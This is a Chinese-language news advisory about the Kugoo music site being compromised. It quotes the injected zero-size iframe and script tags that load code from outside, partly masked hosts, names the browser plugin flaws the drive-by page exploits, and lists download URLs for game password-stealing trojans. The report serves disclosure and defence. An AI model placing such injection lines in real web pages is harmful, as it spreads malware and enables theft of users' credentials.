酷狗網遭遇黑客入侵　用戶小心病毒暗流

News

酷狗網遭遇黑客入侵　用戶小心病毒暗流

【賽迪網-IT技術報道】4月16日，安天實驗室發現，酷狗網(http://www.kugoo.com/home/)被黑客植入病毒，用戶如果訪問該網站，系統就會自動從惡意網站上下載並運行惡意程序。被感染病毒的用戶系統可能被遠程控制，盜取用戶敏感信息。甚至導致死機。

該網站問題代碼：

src=http://tech.ccidnet.com/art/1099/20080417/"http:/ring.ku***.com/cairing/BuildJs/HomePH.aspx"http:/ring.ku***.com/cairing/BuildJs/HomePH.aspx

問題框架代碼：

<iframe src=http://s12.bm***.com/tmp.htm width=0 height=0></iframe> http://s12.bm***.com/tmp.htm

問題框架代碼：

<script language="javascript" src=http://tech.ccidnet.com/art/1099/20080417/"count.js"></script> http://s12.bm***.com/count.js

問題框架代碼：

<iframe src=http://tech.ccidnet.com/art/1099/20080417/test.htm width=0 height=0></iframe> http://s12.bm***.com/http://tech.ccidnet.com/art/1099/20080417/test.htm

問題框架代碼：

<iframe src=http://xxx3.uu****.net/q66.html width=100 height=0>　　</iframe>　　http://xxx3.uu***.net/q66.html

問題框架代碼：

http://xxx3.uu****.net/news1.html

網馬代碼：

該加密網馬解密後可知利用以下漏洞來傳播：

MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)暴風影音播放器MPS.StormPlayer漏洞RealPlayer播放器IERPCtl.IERPCtl.1漏洞迅雷漏洞百度搜霸漏洞聯眾世界遊戲大廳所安裝的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

當用戶運行酷狗2007或訪問酷狗網(http://www.kugoo.com/home/)時，系統會自動下載以下病毒文件：

　　http://aa1.us***.com/down/1.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)　　http://aa1.us***.com/down/2.exe　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)　　http://aa1.us***.com/down/3.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafp)　　http://aa1.us***.com/down/4.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaf)　　http://aa1.us***.com/down/5.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.zjk)　　http://aa1.us***.com/down/6.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)　　http://aa1.us***.com/down/7.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)　　http://aa1.us***.com/down/8.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadu)　　http://aa1.us***.com/down/9.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)　　http://aa1.us***.com/down/10.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)　　http://aa2.us***.com/down/11.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadz)　　http://aa2.us***.com/down/12.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafo)　　http://aa2.us***.com/down/13.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)　　http://aa2.us***.com/down/14.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)　　http://aa2.us***.com/down/15.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)　　http://aa2.us***.com/down/16.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)　　http://aa2.us***.com/down/17.exe　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaig)　　http://aa2.us***.com/down/18.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)　　http://aa2.us***.com/down/19.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)　　http://aa2.us***.com/down/20.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)　　http://aa3.us***.com/down/21.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)　　http://aa3.us***.com/down/22.exe 　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)　　http://aa3.us***.com/down/23.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)　　http://aa3.us***.com/down/24.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)　　http://aa3.us***.com/down/25.exe　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)　　http://aa3.us***.com/down/26.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaes)　　http://aa3.us***.com/down/27.exe　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)　　http://aa3.us***.com/down/28.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aasp)　　http://aa3.us***.com/down/29.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.zvr)　　http://aa3.us***.com/down/30.exe 　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)　　http://aa3.us***.com/down/31.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.yip)　　http://aa3.us***.com/down/32.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafg)　　http://aa3.us***.com/down/33.exe　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)　　http://aa3.us***.com/down/34.exe 　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)

以上病毒文件為下載者木馬和遊戲盜號木馬，自動運行後將會，盜取用戶敏感信息，甚至導致死機。由於下載數量太多，這裡不一一分析。

(

回上頁回首頁

免費客服專線

0800-600-386

【直營地點】
台北資料救援：115台北市南港區三重路19-11號E棟(南港軟體園區)
新竹資料救援：300新竹市東區光復路二段156號
新竹科學園區資料救援：新竹科學工業園區新安路5號4樓 (鴻海大樓裡面)
台南資料救援：700台南市中西區北門路一段57號 TEL:06-505-0005

酷狗網遭遇黑客入侵 用戶小心病毒暗流

酷狗網遭遇黑客入侵　用戶小心病毒暗流